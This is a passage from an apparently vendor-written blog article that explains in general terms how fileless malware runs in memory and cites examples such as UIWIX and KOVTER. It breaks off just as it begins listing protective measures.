Cybercriminals keep sharpening their digital tools of trade to maintain the upper hand over their targets. Among their latest and most effective techniques is the so-called fileless malware, which is estimated to be roughly 10x more likely to succeed than traditional malware attacks.
Given how effective fileless malware is, it’s no surprise that the number of fileless attacks is growing rapidly. Between January 1st and June 30th, 2020, fileless malware was responsible for 30 percent of all detected Indicators of compromise (IOCs), making it the most common threat category during that period.
To protect your organization against this dangerous threat, you must understand how it works and what controls can reliably keep it at bay.
What Is Fileless Malware?
Viruses, Trojan horses, and even ransomware attacks start with a malicious file. To do its job, this file needs to be delivered to the target and executed.
That’s not an easy thing to do because all responsible organizations today use some anti-malware solution to scan new files in order to verify their legitimacy. To get around anti-malware solutions, fileless malware doesn’t touch the hard drive at all, operating entirely in memory.
Typically, a fileless attack starts with a phishing email containing a link to a malicious website. When the victim visits the website, an exploit is automatically triggered, allowing the attacker to remotely load malicious code directly to memory.
The code then latches onto a privileged application, such as Microsoft PowerShell or Windows Management Instrumentation (WMI), so it can initiate malicious processes and spread laterally across the network.
Traditional anti-malware solutions that work by comparing files against a database of known file signatures are oblivious to malicious code infiltrating system memory, leaving the victim defenseless.
What Kind of Damage Can Fileless Malware Cause?
To understand the damage fileless malware can cause, we can look at some of the more famous fileless attacks that have happened in recent years.
The Equifax data breach, which was the largest data breach in 2017 because it exposed the personal information of 147 million people, is a great example of a fileless attack being used to steal sensitive information.
Then there’s UIWIX, a fileless ransomware that spreads via the EternalBlue exploit, which was developed by the U.S. National Security Agency (NSA) and later leaked by the Shadow Brokers hacker group. The same exploit is also used a cryptocurrency miner (TROJ64_COINMINER.QO) to spread without leaving behind any hard drive data.
We should also mention KOVTER, which evolved from a police ransomware into a fileless malware threat capable of downloading the Mimikatz tool to steal login credentials from unsuspecting victims.
As you can see, fileless malware can be used to perform all kinds of nefarious activity, so gaining the means to prevent cybercriminals from doing so should be every organization’s top priority.
How to Protect Against Fileless Malware?
A multi-pronged approach is necessary to effectively protect against fileless malware, and it should include the following components: